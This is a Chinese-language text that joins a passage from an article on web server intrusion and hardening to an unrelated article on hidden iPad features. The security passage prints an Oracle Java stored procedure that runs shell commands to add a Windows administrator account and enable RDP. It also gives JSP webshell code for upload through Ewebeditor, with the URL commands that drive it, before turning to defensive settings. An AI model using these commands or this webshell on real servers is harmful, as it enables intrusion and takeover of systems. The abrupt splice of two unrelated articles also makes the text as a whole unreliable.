存储过程如下:create or replace function run_cmz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; 执行存储命令 exec :x:=run_cmz('cmd /c ver'); exec :x:=run_cmz('cmd /c 'net user ceshi 98765321 /add '); exec :x:=run_cmz('cmd /c 'net localgroup administrators ceshi /add');这样就可以添加了windows 2003系统用户,并提升到超级管理员的权限。如要开启远程计算机3389服务,只要执行如下命令:
exec :x:=run_cmz('cmd /c 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1 ');
1.3 上传漏洞的利用
这种技术方式是利用网站的上传功能来上传木马,正常来说,ASP/PHP/JSP为后缀的文件在网站是不允许上传,但是黑客会攻破这道防护,采取其它技术来上传ASP/PHP/JSP木马,获得服务器的WEBSHELL权限。如Ewebeditor组件在JSP/ASP/PHP开发起到很大作用,但却带来很大的安全隐患,它常被用作上传木马的手段。如JSP网站服务器,通过Ewebeditor可上传abc.jsp文件到服务器,abc.jsp文件代码如下:
String output = "";if(cmd != null) {String s = null;try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {output += s;}}catch(IOException e) {e.printStackTrace();}
}%>
在浏览器上面输入目标ip/abc.jsp?cmd= 'net user ceshi 98765321 /add';
目标ip/abc.jsp?cmd='net localgroup administrators ceshi /add';
目标ip/abc.jsp?cmd=' REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1';
这样就可以添加了windows 2003系统用户,并提升到超级管理员的权限。如要开启远程计算机3389服务。
2 服务器安全防护---应对策略
2.1 架构安全的Web服务器
目前,比较主流的操作系统是Windows2003系统,但因其自身存在着许多系统漏涧及安全隐患,如何对服务器进行安全检测和安全配置显得十分重要。
1)安装操作系统时要选择NTFS文件格式,装完操作系统要杀毒软件。
2)安装系统补丁。扫描漏洞全面杀毒; 删除Windows Server 2003默认共享,命令如下:
@echo off ;
net share C$ /del;
net share D$ /del;
3)禁用IPC连接
在命令行输入如下命令即可进行连接:net use\目标ip\ipc$ "password" /user:"usernqme"。我们可以通过修改注册表来禁用IPC连接。打开注册表编辑器。找到如下组建HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa中的restrictanonymous子键,将其值改为1即可禁用IPC连接。
4)删除"网络连接"里的协议和服务
在"网络连接"里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),同时在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。
5)启用windows连接防火墙,只开放web服务(80端口)。
windows连接防火墙可以有效地拦截对Windows 2003服务器的非法入侵,防止非法远程主机对服务器的扫描,从而提高Windows 2003服务器的安全性。同时,它也可以有效拦截利用操作系统漏洞进行端口攻击的病毒,如冲击波等蠕虫病毒。如果在用Windows 2003构造的虚拟路由器上启用此防火墙功能,能够对整个内部网络起到很好的保护作用,因此我们只开放web服务器常用端口,如80端口。
2.2 构建数据库及程序的安全体系
1) 预防ACCESS数据库下载。把ACCESS数据库的扩展名mdb改为asp/php,通过这种方式来解决ACCESS数据库被识别下载。
2) 防SQL注入攻击。从程序的本身着手,对于用户输入的数据不能直接传参,最有效的方法还是通过存储过程来防止SQL注入。
3) 强化数据库密码的强度,防止数据库的密码泄露,定期修改数据库密码,保证数据库密码的安全。
3 结束语
随着网络飞速发展及B/S服务业务的广泛应用,服务器的安全问题是不可忽略的,防护与入侵这一对矛盾是永远存在的。本文结合工作实际,分析了Web服务器的入侵方式,给出了服务器安全防护的应对策略。
参考文献:
[1] 徐玉国,韩兆君.Web应用程序中的数据库安全策略[J].电脑知识与技术,2007(1):23.
iPad带有你可能已经听说过的所有各种功能,但是,如果进一步探究的话,它还有许多会令你大吃一惊的隐藏功能。这些秘密中的一些是通过应用程序来实现的,而另一些则已经内建在设备中。
把iPad变成桌面显示器
在计算机上安装相应的工具软件并将其连接到Air Display System Preference,iPad就可以成为一个额外的屏幕。可以在Displays System Preference中调整其位置,可以以水平视图或垂直视图的方式工作。尽管它在显示视频的时候略有延迟,但是,对于大多数工作来说,它刷新得足够快,你甚至可以触摸iPad来实现点击操作。
如果等不及Air Display,你现在可以考虑 iDisplay(5美元)。但这是个有问题的竞争性产品,需要进行更新才能很好地与Air Display比拼。
播放PC上的电影
即便你购买了最大容量的iPad,如果它不能装下你的所有视频的话,它还是太小了。你可以使用iPad播放本地或网络上的视频,而不是试图把所有内容都放入到iPad中。这个过程有一个缺陷:如果你从iTunes商店购买电影或者TV,DRM限制会阻止这些文件(播客视频和音乐视频应该可以播放)。但是,你可以观看自己的视频而不受DRM下载服务的限制。
在众多可用的选项中,我最喜欢Air Video(3美元),只要在PC或Mac上安装一个服务器工具,就可以把数据导向iPad。以我的测试,Air Video对大多数分辨率的视频都能顺利地播放,包括通过802.11n Wi-Fi 无线网络的720p视频文件。
该分辨率的视频在802.11g网络上不能顺畅地传输,但是,如果你访问一个太大的文件或者不是iPad友好的QuickTime格式的文件,包括AVI、WMV、ASF、MKV、DIVX和FLV,你可能要让PC远程转换该视频。只需要从iPad界面点击一个按钮就可以开始播放视频,或者用一个快速的PC处理它并现场播放,它甚至支持字幕和TV输出。iPad可以通过其售价29美元的Dock Connector to VGA适配器以1024×768的分辨率向TV发送视频,通过49美元的Apple Component A/V Cable传送576p和 480p的视频,或通过Apple Composite Cable(也是49美元)发送576i或480i的视频。
不只连接摄像头
Apple的iPad Camera Connection Kit(29美元)的功能比描述的要多。这款适配器的USB端口可以连接广泛的设备,而不只是从照相机或SD卡导出照片和视频。
很多USB键盘都可以与iPad 连接,虽然iPad会给出一个警告,说不支持该设备,但是,如果它不消耗太多电力,你完全可以忽略该消息。不但音量和媒体键有效,你甚至可以使用Command-Z这样的桌面命令(别忘了,iPad还正式支持蓝牙键盘和App的iPad键盘Dock)。
USB音频设备也可以正常工作,包括话筒、耳机和麦克。即使一个设备需要较多的电量或繁琐步骤也没有问题:只要把设备连接到一个供电的USB hub,并且把hub连接到Camera Connection Kit适配器。我们甚至可以同时连接不同的设备,例如,键盘和话筒组。
破解更多功能
Apple对iPad的强制性控制,使得它不太像是一台计算机,而更像是一款媒体播放器。但是,你也有替代选择:破解你的iPad,然后,可以运行Apple未批准的第三方应用程序。
如果你想要破解你的iPad,这意味着,你将会失去iPad保修,并且你要对可能发生的错误承担完全责任,或者你也可以使用Camera Connection Kit来读取USB记忆棒和SD卡目录。这样,即使没有破解,你也已经可以使用SD卡视频和照片。或者附加一个Compact Flash阅读器,稍稍折腾一下,你就可以从一个外部USB硬盘读取文件。当然,对于那些热衷技术或甘愿冒险的人,破解才是最好的选择。
你可以把iPad连接到一台计算机,运行Sprit然后通过Cydia界面安装应用程序。Cydia和iTunes应用程序可以共存,因此,你可以安装Backgrounder和Multiflow这样的应用程序,从而允许多任务处理。当然,多任务在OS 4.0中将正式出现。注意,在我们撰写这篇文章时,ProSwitcher(公认的最佳的iPhone多任务应用破解程序)并没有针对iPad优化,坚持使用那些已经针对iPad重新编写的破解应用程序可能会有助于避免不必要的麻烦。
其他的破解应用程序包括适用于iPad版本的Wi-Fi Sync (无线iTunes同步)、Winterboard(定制主题)和Dashboard(OS X风格小挂件)。我们还可以使用带有鼠标的iPad运行游戏控制台模拟器和手柄,并且还可以做一些Apple所不允许的事情。随着iPad破解社区的发展,好处还将不断增多。
远程访问PC
如果你周末匆忙地离开,忘记把一封重要的商务文件复制到笔记本电脑上,可以使用iPad远程桌面工具来访问这些内容。
不管你是通过互联网来访问,或者只是在旁边的房间里,这个过程的速度肯定不足以平稳地播放视频,因此你可能要安装Hulu补丁。但是,如果你可以达到每秒钟处理10到20帧的速度,使用大多数其他应用程序以及慢速移动的Flash游戏例如Farmville,都是没有问题的。
在众多的选择中,我喜欢LogMeIn Ignition(如果想要尽可能少地进行配置的话,需要30美元)和iTeleport(25美元),如果想要手动设置的话,还要加上 VNC Viewer(10美元)。你需要首先给PC配置一个服务器工具软件(或者有一个内置到OS中的选项),然后,你就可以连接任何地方。
所有这3种工具都提供类似的功能,你可以使用手势帮助输入。iTeleport包含较多的键盘选项,例如控制媒体应用程序,但是,我认为其实现不太方便。
如果你只是想坐下来休息一下,并且控制一台计算机来收看电视,Mobile Mouse (3美元)可以把你的iPad变成一个无线键盘、多触点鼠标跟踪板和媒体遥控器。
加速浏览器
从真正的标签开始,Atomic Web(1美元)添加了很多类似桌面的优点。多触点挥动手势甚至可以在打开的站点之间切换。但是,这只是开始。Atomic Web浏览器可以有选择地忽略掉图像,从而节省带宽; 将其自身标示为各种桌面浏览器,让你定制搜索引擎; 甚至在一个页面中搜索文本,修改其按钮等等。
遗憾的是,Safari被作为iPad的默认浏览器。然而,我们可以创建一个标签,在Atomic Web浏览器中重载一个Safari页面。在Atomic Web Browser Settings菜单里,点击Install Bookmarklet,就会打开Safari并展示这一过程。